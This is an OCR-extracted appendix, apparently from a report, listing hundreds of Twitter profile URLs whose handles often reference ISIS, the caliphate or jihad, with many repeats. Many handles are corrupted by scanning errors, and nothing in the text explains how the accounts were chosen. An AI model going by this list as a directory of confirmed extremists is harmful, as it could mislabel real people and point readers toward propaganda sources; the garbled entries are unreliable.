• https://twitter.com/C_NN__15 

• https://twitter.com/IMI32llll 

• https://twitter.com/qjffjfl 

• https://twitter.com/watara211 

• https://twitter.com/ahmdbl0591 

• https://twitter.com/kqhg2020 

• https://twitter.com/baskan360 

• https://twitter.com/alill33asd 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/ayshafalaste2 
161 

• https://twitter.eom/a bokbb?s=09 

• https://twitter.com/ss__k37 

• https://twitter.com/mdf_ss 

• https://twitter.com/dsgbxvl 

• https://twitter.com/aboodyaa33 

• https://twitter.com/qwaq9 




• https://twitter.com/ZAZAZAZ77538028 

• https://twitter.com/VXr8 _911 _a761 

• https://twitter.com/qasem77 Js 

• https://twitter.com/byt_18 

• https://twitter.com/gunl4_5 

• https://twitter.com/jihadiuser58 

• https://twitter.com/mseo556 

• https://twitter.com/ahmdl62 

• https://twitter.com/da3shll 

• https://twitter.com/Shdd36 

• https://twitter.com/solyia _S 

• https://twitter.com/6rY5BpfDrlEez0o 

• https://twitter.com/aboaldardaa3 

• https://twitter.com/isis_1188 

• https://twitter.com/klash252 

• https://twitter.com/frooUmAIBaraa 

• https://twitter.com/khilafatekrit 

• https://twitter.com/TagBq08yYyk 

• https://twitter.com/gffgglll 

• https://twitter.com/Shdd36 




• https://twitter.com/afsdlll 

• https://twitter.com/boxl9xll 

• https://twitter.com/94hjal 

• https://twitter.com/dolawi _y 

• https://twitter.com/dola24687 
162 

• https://twitter.com/abobilalll436 

• https://twitter.com/TurMedia318 

• https://twitter.com/mohb_7 

• https://twitter.com/Bbdbd8 

• https://twitter.com/thecom90 

• https://twitter.com/karim _soura 

• https://twitter.com/AaaHakam 

• https://twitter.com/mhsyaf4 

• https://twitter.com/hubaishi35kh 

• https://twitter.com/001Jabhat 

• https://twitter.com/TurMedia318 

• https://twitter.com/TagBq08yYyk 

• https://twitter.com/saqur27 

• https://twitter.com/Katusha __28 




• https://twitter.com/adg01210 

• https://twitter.com/alrawimot 

• https://twitter.com/ansary2banghaz 

• https://twitter.com/ali _1987 _mag 

• https://twitter.com/madnov28 

• https://twitter.com/kjknhl 

• https://twitter.com/elturkiil 

• https://twitter.com/Abuaishah _01 

• https://twitter.com/sayyyfff333 

• https://twitter.com/hassin2121 

• https://twitter.com/AwakGiantxxx 

• https://twitter.com/all _ameer47 

• https://twitter.com/SultanlEngabu 

• https://twitter.com/asdmiabr 

• https://twitter.com/islams5E 

• https://twitter.com/JgcZq 

• https://twitter.com/jamalbasha _000 
163 

• https://twitter.com/g8670062 1 

• https://twitter.com/isisAnbar54 




• https://twitter.eom/i rontekken94 

• https://twitter.com/Skxxxnews 

• https://twitter.com/isisom60 

• https://twitter.com/3bdr7manal 

• https://twitter.com/HyAml999 

• https://twitter.com/adnanll77655249 

• https://twitter.com/sheeb21 

• https://twitter.com/islam_net2 

• https://twitter.com/ghareb _alsomal 

• https://twitter.com/turmeda000313 

• https://twitter.com/Anbar5m 

• https://twitter.com/de2mu 

• https://twitter.com/c429197ed6d0474 

• https://twitter.com/abu _nidhal _32 

• https://twitter.com/abdallah28891 

• https://twitter.com/abuoyosfalansa5 

• https://twitter.com/joso99292 

• https://twitter.com/ghasalO 

• https://twitter.com/agwied 

• https://twitter.com/zh74cLdPD9Uf3KO 




• https://twitter.com/kh8gh 

• https://twitter.com/gmcgmc888870 

• https://twitter.com/0178105 

• https://twitter.com/kkk _aymenbas95 

• https://twitter.com/EPIC14 

• https://twitter.com/scamp _faridxx 

• https://twitter.com/jundullah _24 

• https://twitter.com/AI _Radically01 

• https://twitter.com/AbSallahdin9 
164 

• https://twitter.com/osamatz 

• https://twitter.com/PraySalah 

• https://twitter.com/56a37f7197ba41c 

• https://twitter.com/AbuSeidl23 

• https://twitter.com/sakwamr 

• https://twitter.com/OmarTheMuslim 

• https://twitter.com/umm_nigeri 

• https://twitter.com/bint _hijratyn 

• https://twitter.com/trillionaire 23 

• https://twitter.com/lslam4Every0ne _ 




• https://twitter.com/amiromarl975 

• https://twitter.com/shahkhannuml 

• https://twitter.com/ _ _Slavery93 

• https://twitter.com/NikoRea_ 

• https://twitter.com/AbuRaihaan8 

• https://twitter.com/987uzhg43efdv 

• https://twitter.com/Tariqul Mawt 

• https://twitter.com/ben7491 

• https://twitter.com/kayadamVF 

• https://twitter.com/ALG jnuslimOll 

• https://twitter.com/skrp 

• https://twitter.com/AIMuwahhidi 

• https://twitter.com/abO _Sulayman7 

• https://twitter.com/killercat600 

• https://twitter.com/khilafah01 _ 

• https://twitter.eom/a _hattem 

• https://twitter.com/therinshaAllah 

• https://twitter.com/TRefugees 

• https://twitter.com/lbnHassany 

• https://twitter.com/AbuAlasRoban 




• https://twitter.com/mod3stbeliever 
165 

• https://twitter.com/mohamme55607260 

• https://twitter.com/HanzaKhattab 

• https://twitter.com/Abusumal3 

• https://twitter.com/abujalaall 

• https://twitter.com/llqwert312 

• https://twitter.com/ygc7xfy 

• https://twitter.com/ramiallolah 

• https://twitter.com/timbosulli 

• https://twitter.com/qatada 93 

• https://twitter.com/aljanady75 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/iislamicl2 

• https://twitter.com/MhdSayf 

• https://twitter.com/ibn _abdiqany 

• https://twitter.com/Dhhd4874 

• https://twitter.com/Migrant2Allah 




• https://twitter.com/abu2legend 

• https://twitter.com/Saeed alHalabiO 

• https://twitter.com/iislamicl2 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/Fahad Buhendi 

• https://twitter.com/VegetaMoustache 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/dola24687 

• https://twitter.com/Bbdbd8 
166 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/dola24687 

• https://twitter.com/jihadiuser58 

• https://twitter.com/nor92331 

• https://twitter.com/ Jhsen _086 _ 

• https://twitter.com/saeul7 




• https://twitter.com/Yamani _5 

• https://twitter.com/tamerl437 

• https://twitter.com/qwerwoow 

• https://twitter.com/abu _khalid 118 

• https://twitter.com/Dhhd4874 

• https://twitter.com/aawwss_22 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/solyia _S 

• https://twitter.com/HuChuin _63 

• https://twitter.com/NeightMid 

• https://twitter.com/Dhhd4874 

• https://twitter.com/AN7070Alisalam 

• https://twitter.com/soman611 

• https://twitter.com/xxx__800 

• https://twitter.com/88ibramz 

• https://twitter.com/OT_IH57 

• https://twitter.com/samaka _26 

• https://twitter.com/Hamdan250dai 

• https://twitter.com/kalmat _haaq 

• https://twitter.com/itc_hallo 




• https://twitter.com/SomQaeda 

• https://twitter.com/TARLEE4 

• https://twitter.com/HJdjdu 

• https://twitter.com/dola24687 

• https://twitter.com/timbosulli 
167 

• https://twitter.com/allbasra 

• https://twitter.com/mahmood 

• https://twitter.com/goo_ias 

• https://twitter.com/rdcongo _news 

• https://twitter.com/Amirbakistani3 

• https://twitter.com/Alhareth_2 

• https://twitter.com/FoopSeven 

• https://twitter.com/R9O7GupXDM0b0pd 

• https://twitter.com/Ansar _AIShariaO 

• https://twitter.com/om _elbarael 

• https://twitter.com/saadsaudi2014 

• https://twitter.com/timotim91217281 

• https://twitter.com/ii_o_01ru 

• https://twitter.com/aljanady75 




• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/Omisshaq 

• https://twitter.com/qatada 93 

• https://twitter.com/ls_zarkiue 

• https://twitter.com/algwsd2233 

• https://twitter.com/dfgndf2 

• https://twitter.com/islamic Jso 

• https://twitter.com/truth _ee 

• https://twitter.com/Fahad _Buhend 

• https://twitter.com/er_er_500 

• https://twitter.com/86Roben 

• https://twitter.com/DsdsdsfSddsd 

• https://twitter.com/sadkingp20 

• https://twitter.com/noor_sban6 

• https://twitter.com/is5 _is5 
168 

• https://twitter.com/qatada 93 

• https://twitter.com/nedalo9314 




• https://twitter.com/Mar44ma 

• https://twitter.com/Manaln9 

• https://twitter.com/aljanady75 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/198 _mazen 

• https://twitter.com/CavalierDuSham 

• https://twitter.com/NaserlS8 

• https://twitter.com/oumme _aymenlO 

• https://twitter.com/gaznaya 

• https://twitter.com/un _serviteur 

• https://twitter.com/Tekindebeyvin 

• https://twitter.com/VegetaMoustache 

• https://twitter.com/Millatlbrahiml 

• https://twitter.com/Hayati JJLLah _ 

• https://twitter.com/Alittl245 

• https://twitter.com/salehalawlqil 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/waswa0127 




• https://twitter.com/ali523480 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/MhdSayf 

• https://twitter.com/IS_IS021 

• https://twitter.com/IS_IS022 

• https://twitter.com/AbdAllahGaza 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/iislamicl2 

• https://twitter.com/ajmurgent 
169 

• https://twitter.com/abujamaludeen02 

• https://twitter.com/ibn _abdiqany 

• https://twitter.com/MisciFromTheD 

• https://twitter.com/3aam _AI _Diri 

• https://twitter.com/alaserlOO 

• https://twitter.com/asd4000hd 

• https://twitter.com/mhuncl231 

• https://twitter.com/Baghdad9191 

• https://twitter.eom/A_A _c 

• https://twitter.com/soman611 




• https://twitter.com/ezzislamm 

• https://twitter.com/ach3ari _maliki 

• https://twitter.com/waja__l 

• https://twitter.com/haydra2233 

• https://twitter.com/Asirat _Tunisial 

• https://twitter.com/KA_N7 

• https://twitter.com/aljabri354 

• https://twitter.com/msaks241 

• https://twitter.com/wffffll089 

• https://twitter.com/Djjjdjd4 

• https://twitter.com/qq _qq _79 

• https://twitter.com/OT_IN57 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/adgrl9 

• https://twitter.com/rkrk4m26 

• https://twitter.com/kaj__s 

• https://twitter.com/ABu AlAylnaa 

• https://twitter.com/ABO _SLEMAN _9 

• https://twitter.eom/d _mf33 

• https://twitter.com/Turbo _zahid 




• https://twitter.com/IITIIillTII 
170 

• https://twitter.com/abujuuad 

• https://twitter.com/Asdl5Wreg 

• https://twitter.com/Ha23ra3F987 

• https://twitter.com/UiU_o_UiU 

• https://twitter.com/isuwh 

• https://twitter.com/zajell8 

• https://twitter.com/j3x_w8p 

• https://twitter.com/dfgvdffcxx 

• https://twitter.com/ississ_is 

• https://twitter.com/DrAlnefisi 

• https://twitter.com/zeydusame5 

• https://twitter.com/KH50380 

• https://twitter.com/dskvnsflk 

• https://twitter.com/aboalhsnllll 

• https://twitter.com/ibn _abdiqany 

• https://twitter.com/Bbdbd8 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/Dhhd4874 




• https://twitter.com/Dr _MagedMohamad 

• https://twitter.com/omarl4373 

• https://twitter.com/Dhhd4874 

• https://twitter.com/akhy01 

• https://twitter.com/HuChuin_63 

• https://twitter.com/Aamnl45Aamn 

• https://twitter.com/DERA_AR 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/syppmgyfsvx34 

• https://twitter.com/abu2legend 

• https://twitter.com/bhCotn 

• https://twitter.com/aboferasalhalab 

• https://twitter.com/arradarl 
171 

• https://twitter.com/an _qa3 

• https://twitter.com/mhmdfaisel 

• https://twitter.com/_17G_ 

• https://twitter.com/kjul03 

• https://twitter.com/jihadist_s 

• https://twitter.com/Saeed alHalabiO 





• https://twitter.com/xl50isisa 

• https://twitter.com/moslem _1110 

• https://twitter.com/Hdlsishd 

• https://twitter.com/iislamicl2 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/aadr40 

• https://twitter.com/alill2777 

• https://twitter.com/abuanas_13 

• https://twitter.com/mlb2q 

• https://twitter.com/ir_12_aq 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/Bukhari 1 

• https://twitter.com/Dawlastan 

• https://twitter.com/Fahad Buhendi 

• https://twitter.com/VegetaMoustache 

• https://twitter.com/norry28974869 

• https://twitter.com/dherghamm31 

• https://twitter.com/maheridlbel 




• https://twitter.com/eysaneyw22 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/AL_21 

• https://twitter.com/nasirulddin 
172 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/_ihsen_086 

• https://twitter.eom/q_zx4 

• https://twitter.com/abohatiml22 

• https://twitter.com/ShShlondon2027 

• https://twitter.com/xcvraqqa 

• https://twitter.com/ahmed88a2 

• https://twitter.com/nomangias 

• https://twitter.com/moosabm738 

• https://twitter.com/WF4WF4 

• https://twitter.com/EhsanAhrar5 

• https://twitter.com/soly_ia 

• https://twitter.com/janah sabiI 





• https://twitter.com/LucasAnton58 

• https://twitter.com/saeafl986 

• https://twitter.com/SdffksoJ 

• https://twitter.com/abo _askndrll66 

• https://twitter.com/andre _poulin49 

• https://twitter.com/hamah _094 

• https://twitter.com/MII32llll 

• https://twitter.com/ahmdbl0591 

• https://twitter.com/baskan360 

• https://twitter.com/alill33asd 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/ss__k37 

• https://twitter.com/dsgbxvl 

• https://twitter.com/ZAZAZAZ77538028 

• https://twitter.com/jihadiuser58 

• https://twitter.com/mseo556 
173 

• https://twitter.com/da3shll 

• https://twitter.com/solyia _S 




• https://twitter.com/6rY5BpfDrlEez0o 

• https://twitter.com/klash252 

• https://twitter.com/afsdlll 

• https://twitter.com/dolawi _y 

• https://twitter.com/dola24687 

• https://twitter.com/abobilalll436 

• https://twitter.com/mohb_7 

• https://twitter.com/Bbdbd8 

• https://twitter.com/karim _soura 

• https://twitter.com/mhsyaf4 

• https://twitter.com/001Jabhat 

• https://twitter.com/saqur27 

• https://twitter.com/alrawimot 

• https://twitter.com/ansary2banghaz 

• https://twitter.com/ali _1987 _mag 

• https://twitter.com/madnov28 

• https://twitter.com/kjknhl 

• https://twitter.com/elturkiil 

• https://twitter.com/Abuaishah _01 

• https://twitter.com/hassin2121 




• https://twitter.com/all _ameer47 

• https://twitter.com/SultanlEngabu 

• https://twitter.com/asdmiabr 

• https://twitter.com/JgcZq 

• https://twitter.com/jamalbasha _000 

• https://twitter.eom/i rontekken94 

• https://twitter.com/Skxxxnews 

• https://twitter.com/isisom60 

• https://twitter.com/HyAml999 
174 

• https://twitter.com/adnanll77655249 

• https://twitter.com/islam_net2 

• https://twitter.com/ghareb alsomal 

• https://twitter.com/turmeda000313 

• https://twitter.com/Anbar5m 

• https://twitter.com/de2mu 

• https://twitter.com/c429197ed6d0474 

• https://twitter.com/abdallah28891 

• https://twitter.com/abuoyosfalansa5 

• https://twitter.com/joso99292 




• https://twitter.com/ghasalO 

• https://twitter.com/agwied 

• https://twitter.com/zh74cLdPD9Uf3KO 

• https://twitter.com/kh8gh 

• https://twitter.com/gmcgmc888870 

• https://twitter.com/0178105 

• https://twitter.com/kkk _aymenbas95 

• https://twitter.com/AbSallahdin9 

• https://twitter.com/osamatz 

• https://twitter.com/PraySalah 

• https://twitter.com/56a37f7197ba41c 

• https://twitter.com/AbuSeidl23 

• https://twitter.com/OmarTheMuslim 

• https://twitter.com/umm_nigeri 

• https://twitter.com/lslam4Every0ne _ 

• https://twitter.com/amiromarl975 

• https://twitter.com/shahkhannuml 

• https://twitter.com/ _ _Slavery93 

• https://twitter.com/NikoRea_ 

• https://twitter.com/987uzhg43efdv 




• https://twitter.com/Tariqul Mawt 
175 

• https://twitter.com/ben7491 

• https://twitter.com/AIMuwahhidi 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/therinshaAllah 

• https://twitter.com/mod3stbeliever 

• https://twitter.com/HanzaKhattab 

• https://twitter.com/abujalaall 

• https://twitter.com/Ansar _DawlalO 

• https://twitter.com/yesteyesic4 

• https://twitter.com/lieffejongen 

• https://twitter.com/Ticaal90 

• https://twitter.com/AliAdenalSomali 

• https://twitter.com/ns45678 

• https://twitter.com/AbouShahadeh 

• https://twitter.com/jihadil0744139 

• https://twitter.com/abohamzaalturki 

• https://twitter.com/JoniManm 

• https://twitter.com/almuhajerBackup 




• https://twitter.com/dhxhsvd2 

• https://twitter.com/77nb_ 

• https://twitter.com/dawlajokers 

• https://twitter.com/dawlawialg671 

• https://twitter.com/fahadeyad62 

• https://twitter.com/btr333btr4 

• https://twitter.com/dola24687 

• https://twitter.com/Talal _Q30 

• https://twitter.com/muslimmouwahed8 

• https://twitter.com/8itismesalman 

• https://twitter.com/jihadiuser58 

• https://twitter.com/meek_don 

• https://twitter.com/yotorg 
176 

• https://twitter.com/facebookaccoun2 

• https://twitter.com/nseem066 

• https://twitter.com/ieshabaqea 

• https://twitter.com/aassddffa833 

• https://twitter.com/nor92331 

• https://twitter.com/lEINusral 




• https://twitter.eom/j Jj Jjj _5577 

• https://twitter.com/_N__ 

• https://twitter.com/Uddjdnl 

• https://twitter.com/bbgg75157900 

• https://twitter.com/Ramal5202 

• https://twitter.com/ J _l _T _E _M _ 

• https://twitter.com/mohamed _zainab4 

• https://twitter.com/Tr8 _K0 

• https://twitter.com/eng__sr 

• https://twitter.com/Om_khatabb 

• https://twitter.com/ubj _k 

• https://twitter.com/KhilafahDawah5 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/ixcncnl 

• https://twitter.com/anaeldora30 

• https://twitter.com/mazenhapne 

• https://twitter.com/Dabiiq7 

• https://twitter.com/A05462492 

• https://twitter.com/Hmode5556Www 

• https://twitter.com/ukhtiaishal 






• https://twitter.com/abcdl23456789a7 

• https://twitter.com/AmonMame 

• https://twitter.com/Abu Bin _Fartin 

• https://twitter.com/_ihsen _086 _ 

• https://twitter.com/gajhfjfd 
177 

• https://twitter.com/0bayd6Wevrw 

• https://twitter.com/e30isisa 

• https://twitter.com/K_H_034 

• https://twitter.com/know_paris 

• https://twitter.com/saeul7 

• https://twitter.com/anjemchoudary 

• https://twitter.com/gmailco69426226 

• https://twitter.com/muslim Iibi 

• https://twitter.com/aabuyosif 

• https://twitter.com/saeul7 

• https://twitter.com/kabugezo 

• https://twitter.com/AbulslamlS1990 

• https://twitter.com/mafel 65 

• https://twitter.com/AbuHafsaBritani 




• https://twitter.com/Ahmadkhalf2012 

• https://twitter.com/YourOwnBroll6 

• https://twitter.com/ReportersOOO 

• https://twitter.com/Wakellp_MV 

• https://twitter.com/saeul7 

• https://twitter.com/jabalybaraa 

• https://twitter.com/s_2017_ 

• https://twitter.com/frm450 

• https://twitter.com/gogoaag82 

• https://twitter.com/xxx__800 

• https://twitter.com/lslamArmy01 

• https://twitter.com/g8670062 _8 

• https://twitter.com/del _elremahl 

• https://twitter.com/ldififkkl 

• https://twitter.com/makdicil970 

• https://twitter.com/mahsudll7 

• https://twitter.eom/K A _S _E _R _5 
178 

• https://twitter.com/lmaqdese 

• https://twitter.com/nour_umm 





• https://twitter.com/5aq5qDGpNsr4IDU 

• https://twitter.com/gaza9310 

• https://twitter.com/Jfdlbk 

• https://twitter.com/Elkhelafa _Now 

• https://twitter.com/lssamSayari 

• https://twitter.com/Abo_mhdi29 

• https://twitter.com/moedker01 

• https://twitter.com/hafeedl001 

• https://twitter.com/Yamani _5 

• https://twitter.com/teagouchl 

• https://twitter.com/aawwss_22 

• https://twitter.com/Dolawiyah Jo6 

• https://twitter.com/gfd6064 

• https://twitter.com/asaudicowdonkey 

• https://twitter.com/UmmAbdallah89 

• https://twitter.com/EhliSunneti3 

• https://twitter.com/salilbnim 

• https://twitter.com/ablo3zaml2 

• https://twitter.com/frost0023 

• https://twitter.com/drherhdfbdrhdhs 




• https://twitter.com/kinght78ag 

• https://twitter.com/Ffhfbfbl 

• https://twitter.com/Almohajer_103 

• https://twitter.com/ahmadsaid91 

• https://twitter.com/dograqqa 

• https://twitter.com/OMoudjahid 

• https://twitter.com/Yamani _5 

• https://twitter.com/ghanimaetfa 

• https://twitter.com/kilafal235 
179 

• https://twitter.com/gh4704721 

• https://twitter.com/Ahmadccx 

• https://twitter.com/alibosatl77 

• https://twitter.com/John23130788 

• https://twitter.com/Hilafet _Haber 

• https://twitter.com/yahyakurdiOO 

• https://twitter.com/Ablul _Vahhab 

• https://twitter.com/dareyya32 

• https://twitter.com/tamerl437 

• https://twitter.com/AbdullahSadun 




• https://twitter.com/MastafaMrafa 

• https://twitter.com/LeysEbu 

• https://twitter.com/taqaddem 

• https://twitter.com/ok_11 

• https://twitter.com/abd _zyaad 

• https://twitter.eom/B _1437K12 

• https://twitter.com/devletul Jslam 

• https://twitter.com/rakka44 

• https://twitter.com/h_k_A010 

• https://twitter.com/forl23123123 

• https://twitter.com/is_power33 

• https://twitter.com/LA_HWADEH _61 

• https://twitter.com/whbbzva 

• https://twitter.com/ihlas95 

• https://twitter.com/qwerwoow 

• https://twitter.com/tamtot2510 

• https://twitter.com/iadl306 

• https://twitter.com/aloqabflagl3 

• https://twitter.com/2bamino 

• https://twitter.com/assiawaisha 




• https://twitter.com/e7isisa 
180 

• https://twitter.com/NasruQarib3 

• https://twitter.com/fffggghhgf 

• https://twitter.com/AbuQaeqael924 

• https://twitter.com/abu _khalidll8 

• https://twitter.com/Jbilou_ 

• https://twitter.com/Newsazerty 

• https://twitter.com/truckii 

• https://twitter.com/DiscoSysteme 

• https://twitter.com/hkwakyl 

• https://twitter.com/abuRawaha008 

• https://twitter.com/muazl9966 

• https://twitter.com/da _fa _ma 

• https://twitter.com/basira67 

• https://twitter.com/Xay_015 

• https://twitter.com/lslamhalall5 

• https://twitter.com/BABER_6666 

• https://twitter.com/aliali29619801 

• https://twitter.com/Dhhd4874 




• https://twitter.com/shaefkll2 

• https://twitter.com/Khaledakis _ 

• https://twitter.com/abo _askndrl20 

• https://twitter.com/KNTLExfnlv01Nzh 

• https://twitter.com/darimi22 

• https://twitter.com/baqqiiya 

• https://twitter.com/HAYAH MAN 

• https://twitter.com/qtada212 

• https://twitter.com/gra7 _q 

• https://twitter.com/ibn_adam75 

• https://twitter.com/soul_Oil 

• https://twitter.com/x35xisis 

• https://twitter.com/runaway003 
181 

• https://twitter.com/sami _almani 

• https://twitter.com/tarkuliev 

• https://twitter.com/Sdy23326287 

• https://twitter.com/TrdfhYtggg 

• https://twitter.com/aawwss_22 

• https://twitter.com/88ibramz 




• https://twitter.com/auwtwg 

• https://twitter.com/Dawla Baqyia 

• https://twitter.com/erherll 

• https://twitter.com/Bdjdjdl6 

• https://twitter.com/alaminhajinubua 

• https://twitter.com/dtdet2 

• https://twitter.com/abu albelgiki 

• https://twitter.com/akhi J2 

• https://twitter.com/jjbgcff 

• https://twitter.com/hgf8273 

• https://twitter.com/mhteegl37 

• https://twitter.com/SawfaNamdzi 

• https://twitter.com/khilafa01 

• https://twitter.com/Karib Alsham 

• https://twitter.com/nnlllgfd 

• https://twitter.com/alshamiabdallal 

• https://twitter.com/ghareeb 001 

• https://twitter.com/samaka _26 

• https://twitter.com/AgeOfKhilafah 

• https://twitter.com/Rehamis58 




• https://twitter.com/sarahl9anbar 

• https://twitter.com/OussamaBagdad 

• https://twitter.com/AnsarAISharial3 

• https://twitter.eom/0_8 

• https://twitter.com/SaefAzdl4 
182 

• https://twitter.com/lbnElwalid4 

• https://twitter.com/SeifMarkl6 

• https://twitter.com/Ahlu __Sunnah 

• https://twitter.com/ridaibnwalid 

• https://twitter.com/nabilbgari 

• https://twitter.com/ _abdulmatin _ 

• https://twitter.com/rabel3anbar 

• https://twitter.com/arab _ellsajinne 

• https://twitter.com/abo _A _M _E _R 

• https://twitter.com/Leathiraq88 

• https://twitter.com/abomoathl437 

• https://twitter.com/Ade superriadi 

• https://twitter.com/samirahijazil 

• https://twitter.com/a090322228 




• https://twitter.com/afadlll 

• https://twitter.com/cmmffl 

• https://twitter.com/BahrainiAgaml 

• https://twitter.com/vip_salami 

• https://twitter.com/deppalotaipi04 

• https://twitter.com/Aomar771 

• https://twitter.com/CitizenArkhab 

• https://twitter.com/Q8__tk 

• https://twitter.com/parl284 

• https://twitter.com/pcl3simpanan 

• https://twitter.com/5antithogut 

• https://twitter.eom/Y XXXIV 

• https://twitter.com/Ara3i _Ebl98 

• https://twitter.com/Q0220Q 

• https://twitter.com/Harth615 

• https://twitter.com/Buibrahiml2 __04 

• https://twitter.com/im _here 
183 

• https://twitter.com/Ultrasmusliml 

• https://twitter.com/7eccba5cf36840e 




• https://twitter.com/twinl943 

• https://twitter.com/VOCON9S12321232 

• https://twitter.com/asyiya _04 

• https://twitter.com/AbangFal 

• https://twitter.com/SadekPasent 

• https://twitter.com/solyia _S 

• https://twitter.com/ghzhjll 

• https://twitter.com/HuChuin _63 

• https://twitter.com/NeightMid 

• https://twitter.com/alhareth0770 

• https://twitter.com/CqlXfdwac 

• https://twitter.com/Daesh _NewsS 

• https://twitter.com/hg5599 

• https://twitter.com/xbeel2 

• https://twitter.com/welll55951 

• https://twitter.com/T7__n3w 

• https://twitter.com/year2022end 

• https://twitter.com/th _akrh 

• https://twitter.com/bladi _00alaslam 

• https://twitter.com/ettaboy3 




• https://twitter.com/wefet_37 

• https://twitter.com/NeightMid 

• https://twitter.com/anasjpumkl 

• https://twitter.com/AheheHaw 

• https://twitter.com/mo895 _mo 

• https://twitter.com/baqiya80 

• https://twitter.com/isis_3366 

• https://twitter.com/al _wafaal083 

• https://twitter.com/e55isisa 
184 

• https://twitter.com/Sahkr_k 

• https://twitter.eom/i Jiill 

• https://twitter.com/Dhhd4874 

• https://twitter.com/ibn _al _khattb 

• https://twitter.com/Hmdani__t 

• https://twitter.com/ao55206 

• https://twitter.com/Cxch2 

• https://twitter.com/jhjhjee_lk 

• https://twitter.com/ShamCenterlNFO 

• https://twitter.com/islam_net2 




• https://twitter.com/dawla_tnt 

• https://twitter.com/moshawkani 

• https://twitter.com/cc erreer 

• https://twitter.com/combattantdivin 

• https://twitter.com/Amirbakistani3 

• https://twitter.com/ebu _nusra 

• https://twitter.com/mabed _5 

• https://twitter.com/Ablul _Vahhab 

• https://twitter.com/dareyya32 

• https://twitter.com/Hilafet _Haber 

• https://twitter.com/yahyakurdiOO 

• https://twitter.com/Ablul _Vahhab 

• https://twitter.com/dareyya32 

• https://twitter.com/kudusungelini 

• https://twitter.com/hpLmnX6tvw2F2mN 

• https://twitter.com/hpLmnX6tvw2F2mN 

• https://twitter.com/turmeda000313 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/K_H_034 

• https://twitter.com/56a37f7197ba41c 




• https://twitter.com/anjemchoudary 
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• https://twitter.com/ben7491 

• https://twitter.com/Raqqa _SL 

• https://twitter.com/qwerwoow 

• https://twitter.com/lEINusral 

• https://twitter.com/SomQaeda 

• https://twitter.com/SomQaeda 

• https://twitter.com/is5 _is5 

• https://twitter.com/sarokhsam25 

• https://twitter.com/taher3832 

• https://twitter.com/beeshbeeshbees3 

• https://twitter.com/aljanady75 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/iislamicl2 

• https://twitter.com/soman611 

• https://twitter.com/zFrBNMgOhJGCOcz 

• https://twitter.com/zxyor09 

• https://twitter.com/iulwiz9Scbm90 




• https://twitter.com/y8J8_ 

• https://twitter.com/abo _hagar44 

• https://twitter.com/gharebbOO 

• https://twitter.com/ab0khalidl3 

• https://twitter.com/Aomar771 

• https://twitter.com/ississjs 

• https://twitter.com/mo895 _mo 

• https://twitter.com/solyia _S 

• https://twitter.com/isis_3366 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/G6A77 

• https://twitter.com/achbahlaill0075 

• https://twitter.com/reem _153 _ 
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• https://twitter.com/zFrBNMgOhJGCOcz 

• https://twitter.com/sh33445555 

• https://twitter.com/Alethawiya44 

• https://twitter.com/As_soumaly 

• https://twitter.com/nor92331 

• https://twitter.com/islamdamasl980 




• https://twitter.com/HA _alshami03 

• https://twitter.com/jundi71033868 

• https://twitter.com/zzzzzxl75 

• https://twitter.com/azdisis58 

• https://twitter.com/tckfnfml 

• https://twitter.com/AstCils71 

• https://twitter.com/Muwaxxid/following 

• https://twitter.com/champl007469284 

• https://twitter.com/abo_lllali 

• https://twitter.com/CbbjVnnj 

• https://twitter.com/yw217 

• https://twitter.com/umm _yasmine 

• https://twitter.com/czlbCfZOMnyubOd 

• https://twitter.com/muahied _8 

• https://twitter.com/AlnjlatMohamad 

• https://twitter.com/iplee4 

• https://twitter.com/isis_3344 

• https://twitter.com/nor964432 

• https://twitter.com/Turbo_113 

• https://twitter.com/ivfkfj2 




• https://twitter.com/Clh9ML 

• https://twitter.com/157aboismail 

• https://twitter.com/cmdmmxl 

• https://twitter.com/RxdctfvDtfhj 

• https://twitter.com/zhranylOO 
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• https://twitter.com/kalldd345 

• https://twitter.com/invasion44 

• https://twitter.com/26anneza3 

• https://twitter.com/Gareeeb45 

• https://twitter.com/baqya520 

• https://twitter.com/fbdfberberber 

• https://twitter.com/treraqqa 

• https://twitter.com/talwtalbghdadyl 

• https://twitter.eom/M _m _m _m _2000 

• https://twitter.com/alsloulistupid 

• https://twitter.com/Aleeeiiii4444 

• https://twitter.com/MatarMurad 

• https://twitter.com/GMC_IS 

• https://twitter.com/Diteslavrit4 




https://twitter.com/abou _walaal2 

https://twitter.com/LLAA554 

https://twitter.com/safeallah425 

https://twitter.com/kinght78ag 

https://twitter.com/Bdjdjdl6 

https://twitter.com/lk_32 _state 

https://twitter.com/hjfkdsll 

https://twitter.com/Om _0said 63 

https://twitter.com/kurdish22 _22 

https://twitter.com/AzdiSayil 

https://twitter.com/ahmedx360xl8 

https://twitter.com/HuChuin _63 

https://twitter.com/parisonourfire 

https://twitter.com/20Trewq 

